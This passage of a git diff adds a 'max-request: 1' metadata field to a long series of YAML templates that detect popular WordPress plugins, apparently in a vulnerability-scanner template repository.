a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..b9de0ee313 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..8033aacbc6 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: + max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git 